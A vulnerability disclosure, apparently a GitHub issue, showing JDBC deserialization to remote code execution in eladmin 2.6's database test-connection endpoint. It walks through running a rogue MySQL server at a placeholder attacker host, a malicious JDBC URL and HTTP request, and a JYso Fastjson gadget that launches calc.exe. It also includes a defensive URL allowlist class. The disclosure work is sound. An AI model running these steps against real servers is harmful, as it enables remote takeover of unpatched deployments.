I noticed that you upgraded the version of mysql-connector-java in your update two weeks ago, so this issue should not occur in the new version of eladmin. However, since the version of org.springframework.boot used in version 2.6 is 2.1.0.RELEASE, which has a default mysql-connector-java version of 8.0.13, it is still susceptible to JDBC deserialization security issues.
To deploy version 2.6 of eladmin, you can obtain the source code from the link below:
https://github.com/elunez/eladmin/blob/babebdee92cb3d1e799b081c3693b4ed079e73c3
As shown in the figure below, the version of org.springframework.boot used in version 2.6 of eladmin is 2.1.0.RELEASE, which has a default mysql-connector-java version of 8.0.13.
What security vulnerabilities could this lead to? Please take note of the following file:
\eladmin-system\src\main\java\me\zhengjie\modules\mnt\rest\DatabaseController.java
Please note that there is a functionality for connecting to the database here.
Analyze the implementation of the testConnection() function.
The testConnection() function of the SqlUtils class is called here, and all the parameters passed to this function are under our control.
Finally, the getConnection() function will be called, which is a classic JDBC deserialization point.
Next, I will deploy eladmin locally. I am using Java 8 and a Windows system for testing.
The backend source code can be downloaded from the following link:
https://github.com/elunez/eladmin/blob/babebdee92cb3d1e799b081c3693b4ed079e73c3
The frontend source code can be downloaded from here:
https://github.com/elunez/eladmin-web
Please ensure that both are properly deployed.
Log in to the system using the default username and password: admin and 123456.
Go to "运维管理-数据库管理" (Operations Management - Database Management) and click the "新增" (Add) button.

Next, we need to deploy a malicious MySQL service, which can be downloaded from the following link:
https://github.com/4ra1n/mysql-fake-server
Use the command java -jar fake-mysql-cli-0.0.4.jar to start this service.
Assume this service is running on:
attacker-vps:3308
We construct the malicious JDBC connection string as follows:
jdbc:mysql://attacker-vps:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
Then click "测试" (Test).

You can see the request below; this is our malicious request:
```http
POST /api/database/testConnect HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer your-jwt-token
Content-Length: 229
Origin: http://o69iay0p.hebyicai.com:8087
Connection: close
Referer: http://o69iay0p.hebyicai.com:8087/
Priority: u=0

{"id":null,"name":"1","jdbcUrl":"jdbc:mysql://attacker-vps:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","userName":"deser_URLDNS_http://xxx.dnslog.cn","pwd":"1"}
```
As we can see, the URLDNS gadget has been successfully triggered, indicating that there is a deserialization vulnerability present here.
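The root cause here is that a caller-controlled JDBC URL reaches `getConnection()` unchecked, so the connector honours properties such as `autoDeserialize` and `queryInterceptors` that let a hostile server drive deserialization. The usual fix is to validate the URL before it reaches the driver: accept only the `jdbc:mysql://` scheme, only hosts the application is meant to talk to, and only an allowlist of connector properties. The following is an added illustration, not eladmin's code and not part of the report; the class name `JdbcUrlGuard`, the allowed property names and the host allowlist are assumptions chosen for the example. The first sample string is the malicious URL from the report (with its `attacker-vps` placeholder); the others are constructed.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/**
 * Hypothetical allowlist check for a user-supplied MySQL JDBC URL, meant to run
 * before anything like SqlUtils.testConnection() / DriverManager.getConnection()
 * sees the string. Added example, not eladmin's own code. Java 8 compatible.
 */
public final class JdbcUrlGuard {

    /** Connector properties a "test connection" feature legitimately needs (assumed set). */
    private static final Set<String> ALLOWED_PARAMS = new HashSet<>(Arrays.asList(
            "useunicode", "characterencoding", "servertimezone",
            "usessl", "requiressl", "connecttimeout", "sockettimeout"));

    /** Properties that turn a rogue server into a deserialization or file-read sink; named only for a clearer message. */
    private static final Set<String> KNOWN_DANGEROUS = new HashSet<>(Arrays.asList(
            "autodeserialize", "queryinterceptors", "statementinterceptors",
            "allowloadlocalinfile", "allowurlinlocalinfile", "allowmultiqueries"));

    public static final class RejectedJdbcUrl extends IllegalArgumentException {
        public RejectedJdbcUrl(String why) { super(why); }
    }

    /** Returns "host:port" when the URL passes every check, throws RejectedJdbcUrl otherwise. */
    public static String validate(String jdbcUrl, Set<String> allowedHosts) {
        if (jdbcUrl == null || !jdbcUrl.startsWith("jdbc:mysql://")) {
            throw new RejectedJdbcUrl("only jdbc:mysql:// URLs are accepted");
        }
        URI uri;
        try {
            // Strip the "jdbc:" prefix so java.net.URI sees a normal mysql://host:port/db?query form.
            uri = new URI(jdbcUrl.substring("jdbc:".length()));
        } catch (URISyntaxException e) {
            throw new RejectedJdbcUrl("malformed JDBC URL");
        }
        // Check the properties first: a single unknown or dangerous key is enough to refuse.
        String query = uri.getRawQuery(); // raw form keeps '&' and '=' as literal separators
        if (query != null && !query.isEmpty()) {
            for (String pair : query.split("&")) {
                String key = pair.split("=", 2)[0].trim().toLowerCase(Locale.ROOT);
                if (KNOWN_DANGEROUS.contains(key)) {
                    throw new RejectedJdbcUrl("dangerous connector property: " + key);
                }
                if (!ALLOWED_PARAMS.contains(key)) {
                    throw new RejectedJdbcUrl("connector property not on the allowlist: " + key);
                }
            }
        }
        // Then pin the destination: no implicit port, and only hosts the deployment expects.
        if (uri.getHost() == null || uri.getPort() == -1) {
            throw new RejectedJdbcUrl("host and port must be explicit");
        }
        String hostPort = uri.getHost() + ":" + uri.getPort();
        if (!allowedHosts.contains(hostPort)) {
            throw new RejectedJdbcUrl("host not on the allowlist: " + hostPort);
        }
        return hostPort;
    }

    public static void main(String[] args) {
        // Constructed allowlist: the one database this deployment is supposed to reach.
        Set<String> allowed = new HashSet<>(Arrays.asList("db.internal.example:3306"));
        String[] samples = {
            // the malicious string from the report; rejected on autoDeserialize before the host is even considered
            "jdbc:mysql://attacker-vps:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
            // constructed benign URL: passes
            "jdbc:mysql://db.internal.example:3306/app?useSSL=true&serverTimezone=UTC",
            // constructed: right host, but a file-read property that the feature never needs
            "jdbc:mysql://db.internal.example:3306/app?allowLoadLocalInfile=true",
            // constructed: wrong driver entirely
            "jdbc:postgresql://db.internal.example:5432/app"
        };
        for (String s : samples) {
            try {
                System.out.println("ACCEPT " + validate(s, allowed));
            } catch (RejectedJdbcUrl e) {
                System.out.println("REJECT " + e.getMessage() + "  <- " + s);
            }
        }
    }
}
```

Comparing property names case-insensitively is deliberately conservative: it refuses `AutoDeserialize` as readily as `autoDeserialize`, so the check does not depend on how strictly the connector itself matches names. For a feature such as this "test connection" endpoint, an even stronger option is to not accept a free-form URL at all and build it server-side from a host, port and database name that are validated separately.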

Next, we aim to achieve Remote Code Execution (RCE) through this deserialization vulnerability, noting that eladmin utilizes the Fastjson dependency.
Therefore, we can use the JYso tool to generate Fastjson gadgets:
https://github.com/qi4L/JYso
java -jar JYso-1.3.3.jar -y -g Fastjson1 -p 'calc.exe' -b64
Copy the payload generated by JYso above and paste it into a file named payload.txt in the root directory of the malicious MySQL server fake-mysql-cli-0.0.4.jar.
Use the following command to restart fake-mysql-cli-0.0.4.jar:
java -jar fake-mysql-cli-0.0.4.jar -f payload.txt
Then modify our malicious request:


Next, we can observe that calc.exe has popped up, which confirms that the Fastjson gadget has executed successfully, directly resulting in remote code execution.

Users should avoid using version 2.6 of eladmin and upgrade to version 2.7 or the latest version as soon as possible.